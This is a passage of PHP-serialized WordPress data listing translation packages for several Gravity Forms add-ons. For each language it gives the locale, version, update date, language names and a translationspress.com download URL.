Indonesia\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-id_ID.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"id\";i:1;s:3:\"ind\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-05-29T10:50:39+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-02-17T09:54:26+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:124:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:46:01+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-06-01T20:44:34+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-06-07T14:59:25+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ro\";a:7:{s:8:\"language\";s:5:\"ro_RO\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2022-06-27T09:53:12+00:00\";s:12:\"english_name\";s:8:\"Romanian\";s:11:\"native_name\";s:8:\"Română\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-ro_RO.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ro\";i:1;s:3:\"ron\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-05-29T10:51:51+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"sr\";a:7:{s:8:\"language\";s:5:\"sr_RS\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2022-06-27T09:53:17+00:00\";s:12:\"english_name\";s:7:\"Serbian\";s:11:\"native_name\";s:23:\"Српски језик\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-sr_RS.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sr\";i:1;s:3:\"srp\";}}s:5:\"es-mx\";a:7:{s:8:\"language\";s:5:\"es_MX\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2022-06-27T09:36:49+00:00\";s:12:\"english_name\";s:16:\"Spanish (Mexico)\";s:11:\"native_name\";s:19:\"Español de México\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-es_MX.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:45:33+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-05-29T10:51:15+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:46:15+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:127:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}s:2:\"uk\";a:7:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2022-06-27T09:53:25+00:00\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:124:\"https://packages.translationspress.com/rocketgenius/gravityformsadvancedpostcreation/gravityformsadvancedpostcreation-uk.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"uk\";i:1;s:3:\"ukr\";}}}}s:20:\"gravityformswebhooks\";a:1:{s:12:\"translations\";a:15:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-02-20T14:35:46+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformswebhooks/gravityformswebhooks-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2021-07-19T17:04:50+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformswebhooks/gravityformswebhooks-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2021-07-23T08:19:27+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformswebhooks/gravityformswebhooks-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-01-06T17:46:31+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformswebhooks/gravityformswebhooks-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-01-06T17:46:51+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformswebhooks/gravityformswebhooks-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2021-07-22T12:47:49+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformswebhooks/gravityformswebhooks-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2021-07-28T15:41:26+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformswebhooks/gravityformswebhooks-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-03-14T17:59:52+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformswebhooks/gravityformswebhooks-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-01-06T17:47:11+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformswebhooks/gravityformswebhooks-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2021-07-22T20:34:31+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformswebhooks/gravityformswebhooks-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2021-07-31T18:10:52+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformswebhooks/gravityformswebhooks-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2021-07-19T13:24:55+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformswebhooks/gravityformswebhooks-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-01-06T17:46:41+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformswebhooks/gravityformswebhooks-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2021-08-02T17:40:38+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformswebhooks/gravityformswebhooks-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-01-06T17:47:24+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformswebhooks/gravityformswebhooks-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:16:\"gravityformspipe\";a:1:{s:12:\"translations\";a:14:{s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-10-26T07:37:52+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformspipe/gravityformspipe-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-10-20T16:25:47+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformspipe/gravityformspipe-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-11-03T14:29:46+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformspipe/gravityformspipe-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-11-01T10:02:06+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformspipe/gravityformspipe-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-10-25T15:56:38+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformspipe/gravityformspipe-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-11-02T07:32:59+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformspipe/gravityformspipe-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-03-14T17:55:39+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:92:\"https://packages.translationspress.com/rocketgenius/gravityformspipe/gravityformspipe-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2021-09-14T09:54:12+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformspipe/gravityformspipe-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-11-10T22:09:12+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformspipe/gravityformspipe-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:48:20+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformspipe/gravityformspipe-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-10-29T05:59:20+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformspipe/gravityformspipe-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-11-04T22:40:13+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformspipe/gravityformspipe-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2022-06-27T09:08:58+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformspipe/gravityformspipe-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2020-10-26T10:13:02+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformspipe/gravityformspipe-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:27:\"gravityformsconstantcontact\";a:1:{s:12:\"translations\";a:22:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2022-06-27T08:55:12+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:114:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-01-06T17:00:29+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2020-10-26T09:00:35+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2022-06-27T08:55:20+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2022-06-27T08:55:23+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-01-06T17:00:49+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:114:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-03-02T20:35:48+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2020-10-21T11:36:30+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-01-06T17:48:43+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-01-06T17:49:00+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2020-10-25T15:55:38+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-01-06T17:49:07+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-03-14T17:46:28+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:114:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"nb\";a:7:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-03-02T20:35:55+00:00\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-nb_NO.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nb\";i:1;s:3:\"nob\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-01-06T17:49:20+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-01-06T17:49:22+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-01-06T17:49:24+00:00\";s:12:\"english_name\";s:21:\"Portuguese 